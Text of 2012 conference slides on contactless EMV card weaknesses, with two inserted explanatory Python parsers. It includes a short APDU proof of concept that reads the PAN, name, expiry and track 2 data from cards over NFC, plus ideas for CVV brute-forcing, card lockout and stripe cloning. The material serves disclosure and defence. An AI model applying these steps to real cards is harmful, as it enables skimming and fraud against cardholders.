HES 2012 Rlifchitz Contactless Payments Insecurity
“Hacking the NFC credit cards for fun and debit ;-)”
Renaud Lifchitz, BT. Hackito Ergo Sum 2012, April 12, 13, 14, Paris, France

Speaker's bio
Penetration testing & security audits
Security trainings
Security research
Main interests:
Security of protocols (authentication, cryptography, information leakage, zero-knowledge proofs...)
Number theory (integer factorization, primality testing, elliptic curves...)
Everyday payment with no need for card insertion nor card PIN code
Main systems: VISA payWave & MasterCard PayPass
Small payments (for instance 4 times 20€ in a row)
100,000 payment terminals in France
10 million NFC-enabled credit cards in the U.S.
Achieve faster/simpler/easier payments
Make people buy more (MasterCard Canada has seen “about 25 percent” higher spending by its PayPass users)
Interoperable systems
Data storage and security: EMV standards (Europay, MasterCard and VISA)
Protocol commands and card storage layout: ISO 7816 standards
EMV
Card memory: a real filesystem with a root directory (MF), folders (DF) and files (EF) identified by 2 bytes, according to ISO 7816-4
Data encoding: BER-TLV (very close to ASN.1) → online decoder: http://www.emvlab.org/tlvutils/
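As an added example (not code from the slides or from the author's tooling), here is a small BER-TLV decoder in Python that walks a READ RECORD response the way the emvlab decoder does: multi-byte tags, short and long length forms, recursive templates, then extraction of the fields the talk lists as readable (PAN, name, expiry, track 2). The sample record is constructed for this example and carries the public 4111 1111 1111 1111 test PAN, not data from any real card; the tag-name table and helper names are this example's own.

```python
from dataclasses import dataclass, field
from typing import Dict, List

# Tags for the data objects the talk reports as readable over NFC; others are shown raw.
EMV_TAG_NAMES = {
    "70": "READ RECORD response template",
    "57": "Track 2 equivalent data (magnetic stripe)",
    "5A": "Application PAN",
    "5F20": "Cardholder name",
    "5F24": "Application expiration date (YYMMDD)",
}


@dataclass
class TLV:
    tag: str                      # hex string, e.g. "5A" or "5F24"
    value: bytes
    children: List["TLV"] = field(default_factory=list)

    @property
    def constructed(self) -> bool:
        # Bit 6 (0x20) of the first tag byte marks a constructed (template) object.
        return bool(int(self.tag[:2], 16) & 0x20)


def parse_tlv(data: bytes) -> List[TLV]:
    """Decode a sequence of BER-TLV objects; templates are decoded recursively."""
    objs, i = [], 0
    while i < len(data):
        if data[i] in (0x00, 0xFF):           # EMV allows 00/FF padding between objects
            i += 1
            continue
        # Tag: one byte, or more if the low five bits are all set (bit 8 then continues it).
        start, i = i, i + 1
        if data[start] & 0x1F == 0x1F:
            while data[i] & 0x80:
                i += 1
            i += 1
        tag = data[start:i].hex().upper()
        if i >= len(data):
            raise ValueError(f"missing length for tag {tag}")
        # Length: short form (< 0x80) or long form 0x8N followed by N length bytes.
        length, i = data[i], i + 1
        if length & 0x80:
            n = length & 0x7F
            if not 1 <= n <= 4:
                raise ValueError(f"unsupported length encoding for tag {tag}")
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        value = data[i:i + length]
        if len(value) != length:
            raise ValueError(f"truncated value for tag {tag}")
        i += length
        obj = TLV(tag, value)
        if obj.constructed:
            obj.children = parse_tlv(value)
        objs.append(obj)
    return objs


def flatten(objs: List[TLV]) -> Dict[str, bytes]:
    """Map every primitive tag, at any nesting depth, to its value."""
    out: Dict[str, bytes] = {}
    for o in objs:
        out.update(flatten(o.children) if o.constructed else {o.tag: o.value})
    return out


def decode_cn(value: bytes) -> str:
    """EMV compressed numeric: BCD digits, right-padded with F nibbles."""
    return value.hex().upper().rstrip("F")


def mask_pan(pan: str) -> str:
    """PCI DSS display rule: at most the first six and last four digits visible."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def cardholder_summary(record: bytes) -> Dict[str, str]:
    """Pull out the fields the talk lists as readable from one READ RECORD response."""
    fields = flatten(parse_tlv(record))
    return {
        "pan": mask_pan(decode_cn(fields["5A"])),
        "name": fields["5F20"].decode("ascii").strip(),
        "expiry": decode_cn(fields["5F24"]),
        # Track 2 equivalent: PAN, separator D, expiry YYMM, service code, discretionary data
        "track2": decode_cn(fields["57"]).replace("D", "="),
    }


# Constructed sample record (template 70 holding 5A, 5F24, 5F20, 57). The PAN is the
# public 4111 1111 1111 1111 test number, not data read from any real card.
SAMPLE_RECORD = bytes.fromhex(
    "70 2E"
    "5A 08 41 11 11 11 11 11 11 11"
    "5F 24 03 14 12 31"
    "5F 20 08 44 4F 45 2F 4A 4F 48 4E"
    "57 11 41 11 11 11 11 11 11 11 D1 41 22 01 12 34 56 78 90"
)


def dump(objs: List[TLV], depth: int = 0) -> List[str]:
    """Human-readable listing, one line per object, like the emvlab decoder output."""
    lines = []
    for o in objs:
        name = EMV_TAG_NAMES.get(o.tag, "unknown tag")
        lines.append(f"{'  ' * depth}{o.tag} ({name}) len={len(o.value)}"
                     + ("" if o.constructed else f" value={o.value.hex().upper()}"))
        lines.extend(dump(o.children, depth + 1))
    return lines


if __name__ == "__main__":
    print("\n".join(dump(parse_tlv(SAMPLE_RECORD))))
    print(cardholder_summary(SAMPLE_RECORD))
```

Note that nothing in the record is protected: once the card answers a READ RECORD, the PAN, name, expiry and track 2 data fall straight out of the TLV structure, which is the point the following slides make.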
ISO 7816-4
Command APDU layout:
Class (1 byte) | Instruction (1 byte) | Parameters 1 & 2 (1 byte each) | Length of data (1 byte) | Data field | Length of expected response (1 byte)
Answers: response data followed by the two status bytes SW1 SW2 (e.g. 90 00 for success)
The idea
French Navigo contactless transportation cards also use ISO 7816 encapsulation over RFID but:
No personal data on card (card ID ≠ cardholder ID)
Use good encryption
Use good authentication
RFID passports:
Use digital signature
Use encryption
Use a combined reading to avoid rogue access (optical+RFID)
→ RFID credit cards (= money) should be as secure as those two, shouldn't they?
NFC
Different names for nearly the same thing: RFID/NFC/Cityzi
HF (13.56 MHz) & LF (125-134 kHz) usages
Most common HF protocol: ISO 14443 (ISO 14443-1 to ISO 14443-4)
Can be used for tunneling/encapsulation
NFC readers
USB readers:
SCM SCL3711 (40€ dongle)
ACS ACR120U/ACR122U (flat)
Phones:
Samsung Nexus S, Samsung Galaxy Nexus
BlackBerry Bold 9900/9930, BlackBerry Curve 9350/9360/9370
Nokia N9/C7/603
Tools
ISO 7816 (contact) prototyping: scriptor
NFC (contactless) prototyping: libnfc pn53x-tamashell
Final coding: libnfc (EOF, SOF and CRC are automagically handled)
Confirmed:
Cardholder: gender, first name and last name
PAN (Primary Account Number)
Expiration date
Magnetic stripe data
Transaction history
Probably: general card information (issuer, public keys, …)
But no CVV! (just a one-time-CVV functionality)
Possible attacks
Read victim's card data and use it on e-commerce websites: CVV is not always mandatory and CVV can be bruteforced (only 1000 possibilities...)
Remote card DoS? (send 3 times a bad PIN code)
Create a magnetic stripe dump remotely (card clone will be useful where chip card/PIN is not mandatory: most EU countries, USA, …)
User identification and tracking (terrorism...)
Proof of Concept
pn53x-tamashell session (PN53x command bytes, then the APDU carried by InDataExchange):
4A 01 00                                        InListPassiveTarget: one ISO 14443A target
40 01 00 A4 04 00 07 A0 00 00 00 42 10 10 00    InDataExchange: SELECT by AID A0 00 00 00 42 10 10 (AID selection)
40 01 00 B2 02 0C 00 00                         InDataExchange: READ RECORD 2 from SFI 1
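Added example, not the talk's own PoC code: the ISO 7816-4 command/response layout from the earlier slide, applied to the APDUs carried by the pn53x-tamashell session above. The session lines below are constructed to match the PoC commands; the function names, the `describe` labels and the small status-word table are this example's own assumptions.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class CommandAPDU:
    cla: int
    ins: int
    p1: int
    p2: int
    data: bytes = b""
    le: Optional[int] = None      # None: no Le field; 0x00: "up to 256 bytes expected"

    def encode(self) -> bytes:
        """Short-form encoding: CLA INS P1 P2 [Lc data] [Le]."""
        out = bytes([self.cla, self.ins, self.p1, self.p2])
        if self.data:
            out += bytes([len(self.data)]) + self.data
        if self.le is not None:
            out += bytes([self.le])
        return out


def parse_apdu(raw: bytes) -> CommandAPDU:
    """Split a short-form command APDU into its fields (ISO 7816-4 cases 1 to 4)."""
    if len(raw) < 4:
        raise ValueError("APDU shorter than the 4-byte header")
    cla, ins, p1, p2 = raw[:4]
    body = raw[4:]
    if not body:                              # case 1: header only
        return CommandAPDU(cla, ins, p1, p2)
    if len(body) == 1:                        # case 2: header + Le
        return CommandAPDU(cla, ins, p1, p2, le=body[0])
    lc = body[0]
    if len(body) == 1 + lc:                   # case 3: header + Lc + data
        return CommandAPDU(cla, ins, p1, p2, bytes(body[1:1 + lc]))
    if len(body) == 2 + lc:                   # case 4: header + Lc + data + Le
        return CommandAPDU(cla, ins, p1, p2, bytes(body[1:1 + lc]), le=body[1 + lc])
    raise ValueError("Lc does not match the APDU length")


# A few ISO 7816-4 status words a reader will meet while probing a card (example table).
STATUS_WORDS = {
    0x9000: "OK",
    0x6A82: "file or application not found",
    0x6A83: "record not found",
    0x6982: "security status not satisfied",
    0x6983: "authentication method blocked",
}


def parse_response(raw: bytes) -> Tuple[bytes, int, str]:
    """A response APDU is [data] SW1 SW2; return (data, status word, meaning)."""
    if len(raw) < 2:
        raise ValueError("response shorter than SW1 SW2")
    sw = int.from_bytes(raw[-2:], "big")
    if sw >> 8 == 0x6C:                       # wrong Le: SW2 carries the exact length
        meaning = f"wrong Le, resend with Le={sw & 0xFF}"
    elif sw >> 8 == 0x61:                     # more data waiting for GET RESPONSE
        meaning = f"{sw & 0xFF} more bytes available"
    else:
        meaning = STATUS_WORDS.get(sw, "unknown status")
    return raw[:-2], sw, meaning


def select_by_aid(aid: bytes) -> CommandAPDU:
    """SELECT (INS A4) by DF name (P1=04), first occurrence (P2=00), Le=00."""
    return CommandAPDU(0x00, 0xA4, 0x04, 0x00, aid, le=0x00)


def read_record(sfi: int, rec: int) -> CommandAPDU:
    """READ RECORD (INS B2): P1 = record number, P2 = SFI << 3 | 4 (P1 is a record number)."""
    return CommandAPDU(0x00, 0xB2, rec, (sfi << 3) | 0x04, le=0x00)


def describe(apdu: CommandAPDU) -> str:
    """Name the two commands used in the PoC; anything else is shown as raw header bytes."""
    if apdu.ins == 0xA4 and apdu.p1 == 0x04:
        return f"SELECT AID {apdu.data.hex().upper()}"
    if apdu.ins == 0xB2 and apdu.p2 & 0x07 == 0x04:
        return f"READ RECORD {apdu.p1} from SFI {apdu.p2 >> 3}"
    return f"INS {apdu.ins:02X} P1 {apdu.p1:02X} P2 {apdu.p2:02X}"


# Constructed pn53x-tamashell session matching the PoC: 4A = InListPassiveTarget (one
# ISO 14443A target at 106 kbps), 40 01 = InDataExchange to target 1, the APDU follows.
POC_LISTING = """
4A 01 00
40 01 00 A4 04 00 07 A0 00 00 00 42 10 10 00
40 01 00 B2 02 0C 00
"""


def tamashell_apdus(listing: str) -> List[CommandAPDU]:
    """Extract the APDUs carried by InDataExchange lines; other PN53x commands are skipped."""
    apdus = []
    for line in listing.strip().splitlines():
        frame = bytes.fromhex(line)
        if frame[:2] == b"\x40\x01":
            apdus.append(parse_apdu(frame[2:]))
    return apdus


if __name__ == "__main__":
    for apdu in tamashell_apdus(POC_LISTING):
        print(f"{apdu.encode().hex().upper():<28} {describe(apdu)}")
    # A card that does not carry the selected application answers SELECT with SW 6A82:
    print(parse_response(bytes.fromhex("6A82")))
```

The SELECT and READ RECORD pair is all the reader needs: neither command is preceded by any authentication of the reader, so whatever the card stores in that record is returned to anyone who can reach it over the air.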
Attack limitations
Active read up to 3 to 5 cm in practice
Active read up to 1.5 m (50x better!) using a dedicated amplifier (2000€) and antenna (1000€). Everything fits into a backpack...
Passive sniffing up to 15 m (500x better!) using a radio receiver (e.g. USRP) with a standard telescopic antenna
Remember: in August 2004, hackers succeeded in extending a Bluetooth dongle range from 10 m to 1.7 km! (http://trifinite.org/trifinite_stuff_lds.html)
Passive sniffing
(figure: reader probes, communication with the credit card, and then probes again)
How to protect?
(figure: two protection options shown side by side, separated by "OR")
Contactless accesses should be authenticated to avoid rogue readers
Contactless protocol should be encrypted to avoid eavesdropping
Session integrity should be ensured (e.g. HMAC) to avoid injection
This already exists!!! (for example the French Navigo transportation card)
Conclusion: EMV is poorly designed for NFC and needs a complete rewrite!...
Regulatory compliance
PCI DSS is intended for organizations that handle cardholder information (merchants, financial institutions, software & hardware developers, industry professionals...)
“PCI Data Security Standard is a multifaceted security standard that includes requirements for security management, policies, procedures, network architecture, software design and other critical protective measures. This comprehensive standard is intended to help organizations proactively protect customer account data.” (https://www.pcisecuritystandards.org)
PCI DSS is sponsored by the same companies that have designed and distributed NFC credit cards (Visa, MasterCard, ...) in order to avoid fraud
Requirement 4 of PCI DSS - "Encrypt transmission of cardholder data across open, public networks":
Scope: all wireless technologies
Testing Procedure 4.1.a: “Select a sample of transactions as they are received and observe transactions as they occur to verify that cardholder data is encrypted during transit.”
Unsolicited accesses and most solicited accesses to the credit cards are CLEARTEXT AND INCLUDE CARDHOLDER DATA
This is a MAJOR FAIL!
NFC payments are not compliant with PCI DSS and organizations can become non-compliant by accepting them...
However, one of the 2 biggest credit card suppliers states in its public FAQ that “technically, the contactless functionality (...) protects cardholder information using very secured dynamic cryptograms”. Indeed, it's cleartext!!!
In France, it is a criminal offense not to protect personal data when you handle them
You also have to comply with EU regulatory constraints on personal data protection
CNIL, a French public organization, is responsible for reporting offenses
That's why credit card suppliers probably don't comply with French law either!...
Timeline of discovery
December 2nd, 2011: discovery
I notify my personal bank during the following week. They thanked me for the step but since then I have no news
January 30, 2012: Kristin Paget shows something quite similar at Shmoocon, using dedicated commercial hardware
A bit later, the French GIE CB officially states that they are aware of risks with NFC credit cards
April 3, 2012: I notify some other banks, the French Ministry of Finance and the CNIL during a short demo (GS Days 2012, Paris)
Investigations are currently being made by these organizations and law enforcement
This is NOT reverse engineering: the EMV standard has been available to everybody for a long time. The proof of concept is just a small EMV implementation
This is NOT made for counterfeits: we have just extracted personal information that already belongs to us, and this is neither necessary nor sufficient for counterfeits
We HAVEN'T BROKEN any security or tried to, because there is none!
Thanks!
Any questions?